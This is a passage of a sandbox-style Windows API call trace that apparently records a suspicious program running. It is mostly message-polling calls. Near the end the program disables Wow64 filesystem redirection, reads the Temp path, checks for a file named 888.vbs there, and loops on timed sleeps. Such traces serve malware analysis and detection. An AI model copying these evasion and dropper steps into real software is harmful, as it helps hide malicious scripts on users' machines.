lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.414] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.415] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.416] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.417] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.417] CharLowerBuffW (in: lpsz="boolean", cchLength=0x7 | out: lpsz="boolean") returned 0x7 [0133.417] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76c20000 [0133.417] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0133.419] FreeLibrary (hLibModule=0x76c20000) returned 1 [0133.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1048 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1178 [0133.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0133.419] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.420] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91e0 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a91b0 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91c8 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9000 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a91e0 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0133.420] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0133.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9000 | out: hHeap=0x25c0000) returned 1 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91c8 | out: hHeap=0x25c0000) returned 1 [0133.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91e0 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a91b0 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0133.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0133.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5a) returned 0x240da88 [0133.421] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", lpFilePart=0x8bedfc*="888.vbs") returned 0x2c [0133.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0133.421] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\888.vbs")) returned 0xffffffff [0133.421] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0xa99400, ftCreationTime.dwHighDateTime=0x178000c, ftLastAccessTime.dwLowDateTime=0x4, ftLastAccessTime.dwHighDateTime=0x5601cc, ftLastWriteTime.dwLowDateTime=0x6ca, ftLastWriteTime.dwHighDateTime=0x34, nFileSizeHigh=0x48, nFileSizeLow=0x25c6d68, dwReserved0=0x4, dwReserved1=0x4, cFileName="\x80", cAlternateFileName="")) returned 0xffffffff [0133.422] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0133.422] GetLastError () returned 0x6 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0133.422] timeGetTime () returned 0x2db6f [0133.422] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.422] Sleep (dwMilliseconds=0xa) [0133.428] timeGetTime () returned 0x2db7f [0133.428] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.428] Sleep (dwMilliseconds=0xa) [0133.443] timeGetTime () returned 0x2db8f [0133.443] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.443] Sleep (dwMilliseconds=0xa) [0133.458] timeGetTime () returned 0x2db9e [0133.458] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.458] Sleep (dwMilliseconds=0xa) [0133.474] timeGetTime () returned 0x2dbae [0133.474] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.474] Sleep (dwMilliseconds=0xa) [0133.489] timeGetTime () returned 0x2dbbd [0133.490] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.490] Sleep (dwMilliseconds=0xa) [0133.505] timeGetTime () returned 0x2dbcd [0133.505] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.505] Sleep (dwMilliseconds=0xa) [0133.521] timeGetTime () returned 0x2dbdd [0133.521] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.521] Sleep (dwMilliseconds=0xa) [0133.536] timeGetTime () returned 0x2dbec [0133.536] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0133.536] Sleep (dwMilliseconds=0xa) [0133.552] timeGetTime () returned 0x2dbfc [0133.552] 